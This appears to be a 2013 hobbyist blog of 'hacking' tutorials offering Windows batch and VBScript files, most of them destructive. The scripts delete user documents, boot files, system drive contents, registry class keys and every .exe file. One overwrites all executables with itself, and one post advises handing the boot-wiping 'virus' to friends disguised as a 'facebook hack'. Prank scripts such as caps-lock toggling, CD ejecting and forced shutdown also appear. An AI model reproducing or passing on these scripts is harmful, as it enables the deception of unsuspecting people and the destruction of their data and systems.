Sunday 19 May 2013

Delete all music Files In Computer

0 comments
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::


Save As batch.bat

Happy Hacking

Delete all documents

0 comments
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::


Save As batch.bat

Saturday 4 May 2013

Tutorial Destroy Anyone's Computer With This File

0 comments
What the file will do ?

The file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again, so you got it right well if you are pranking with your friend or your enemy remember that his or her computer will never restart unless new Windows is installed.

Method :

1. Open Notepad and copy the code given below.

Code:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

2. Save as "anyname.bat" (without quotes)

3. Now the virus is ready and you can give it to your friends by calling it a facebook hack or anything you want.


Warning :

Don’t click on this file in your Computer.

The Blue Screen Of Death PC and Laptop

0 comments
What will this file do ?

It will appear the blue screen of death in windows and then the computer will shutdown.



Method :


1. Open Notepad and copy the code given below.

Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2. Save as "Anything.bat" (Without quotes & .bat is must).

Tutorial Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT YOUR OWN RISK]

0 comments
What will this VBS file do ?

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).


Method :


1. Open Notepad and copy the code given below

 
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

2. Save as "Anything.bat" (Without quotes & .bat is must)

Stupidity Shutdown

0 comments
What will the file do ?

This pops up a funny message then will shutdown the computer


Method :

1. Open Notepad and copy the code given below.

Code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

2. Save as "Anything.bat" (Without quotes & .bat is must).

Tutorial Crazy Caps Lock

1 comments

What will this file do ?

This constantly turns caps lock on and off really fast continuously.


Method :

1. Open Notepad and copy the code given below.


Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

2. Save as "Anything.vbs" (Without quotes & .vbs is must).

Tutorial Endless Backspace

0 comments
What will this file do ?

This makes it so the backspace key is constantly being pressed.


Method :

1. Open Notepad and copy the code given below.

Code:

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

2. Save as "Anything.vbs" (Without quotes & .vbs is must).

Popping CD Drives

0 comments
Popping CD Drives What will this file do ?

This will make the CD drives constantly pop out.


Method :

1. Open Notepad and copy the code given below.
 ------------------------------------------------------------
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

 ------------------------------------------------

2. Save as "Anything.vbs" (Without quotes & .vbs is must). 

 

How To Kill Explorer.exe Using Batch File

0 comments
Method :

1. Open Notepad

2. Type the code given below

Code:
@echo off
taskkill /f /IM explorer.exe

3. Save as "Anything.bat" (Without quotes)

Colorful animation Batch files

3 comments
Colorful animation Batch files This code show the text you write and keeps changing it's color randomly.
Change the text to your own text or ascii art.


Code
 
@echo off
cls
echo.
echo.
echo.
echo      .########..########....#####...##.....##.##....##
echo      .##.....##.##.....##..##...##...##...##...##..##.
echo      .##.....##.##.....##.##.....##...##.##.....####..
echo      .########..########..##.....##....###.......##...
echo      .##........##...##...##.....##...##.##......##...
echo      .##........##....##...##...##...##...##.....##...
echo      .##........##.....##...#####...##.....##....##...
:colors
Set /a num=(%Random% %%9)+1
color %num%
PING 127.0.0.1 -n 2 > NUL
goto colors



Save anything.bat

Delete All .EXE Files On The Computer

1 comments
Method :

1. Open Notepad

2. Copy the code given below


Code:
@ echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------

3. Save as "Anything.bat"

Warning :
Do not try this at your own computer. I will not be responsible for any damages caused to your computer.

Tutorial SPAM Local Disk

0 comments
Method :

1. Open Notepad

2. Copy the code given below


Code:
@ echo off
rem ---------------------------------
rem Spam Local Disk
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'

3. Save as "Anything.bat"

Warning :
Do not try this on your own computer. I will not be responsible for any damages caused to your computer.

Infect All .exe Files In The Computer

0 comments
Method :

1. Open Notepad

2. Copy the code given below


Code:
@ echo off
rem ---------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------

3. Save as "Anything.bat"

Warning :
Do not try this on your own computer. I will not be responsible for any damages caused to your computer